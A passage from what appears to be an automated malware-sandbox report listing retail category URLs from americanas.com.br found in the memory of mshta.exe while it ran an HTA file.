00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal?chave=pfm_home_natal_menu
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/esporte-e-lazer?chave=dk_hm_at_esporte.
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/esporte-e-lazer?chave=dk_hm_at_esporte6
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379435044.000000000B70A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/esporte-e-lazer?chave=pfm_home_esporte_menu
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458855174.0000000006F14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483197472.0000000006F16000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398326236.0000000006F14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478014141.0000000006F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/games?chave=pfm_home_games_menu
Source: mshta.exe, 00000000.00000003.25392143865.000000000A9B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462689449.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443475613.000000000A9B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460334244.000000000AC20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488630378.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402328770.000000000AC1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486282298.000000000A9B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401838854.000000000AC13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401507649.000000000AC06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/gift
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/gift-card?chave=dk_hm_ats_2_10_giftcard
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403038428.000000000AA70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/gift-card?chave=pfm_home_gc_menu
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402424995.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459239751.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica-e-acessorios?chave=pfm_home_infoacess_menu
Source: mshta.exe, 00000000.00000002.25483197472.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460710979.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438921649.0000000009C41000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394938920.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458855174.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410501035.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484353798.0000000009497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica/computadores-e-all-in-one/computador-gamer?chave
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403823205.000000000B654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460710979.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444845667.0000000009564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462978019.000000000B696000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484992429.0000000009565000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460847777.000000000B657000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377202169.000000000B654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489928071.000000000B699000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443682382.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394938920.0000000009497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica/computadores-e-all-in-one/computador?chave=pfm_h
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403823205.000000000B654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462978019.000000000B696000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460847777.000000000B657000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377202169.000000000B654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489928071.000000000B699000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25482972272.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica/notebooks-gamer?chave=pfm_hm_tt_1_0_notebook-gam
Source: mshta.exe, 00000000.00000003.25402097354.000000000AC33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465598138.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459670621.000000000AA7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489837872.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464016855.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401903465.000000000AC27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica/notebooks?chave=dk_hm_at_notebooks
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477835168.000000000AC0E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400654336.000000000ABA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377309102.000000000AB99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377868768.000000000ABA1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401507649.000000000AC06000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica/notebooks?chave=pfm_hm_tt_1_0_notebook
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica/notebooks?chave=pfm_hm_tt_1_0_notebooko
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica/tablet-e-ipad/tablet?chave=pfm_hm_tt_1_0_tabletK
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478510709.000000000AC5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477835168.000000000AC0E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC5F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400654336.000000000ABA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405052073.000000000B734000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica?chave=pfm_hm_tt_1_0_informatica
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica?chave=pfm_hm_tt_1_0_informaticaW
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377309102.000000000AB6C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377467003.000000000AB73000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica?chave=pfm_home_informatica_menu
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica?chave=pfm_home_informatica_menuo
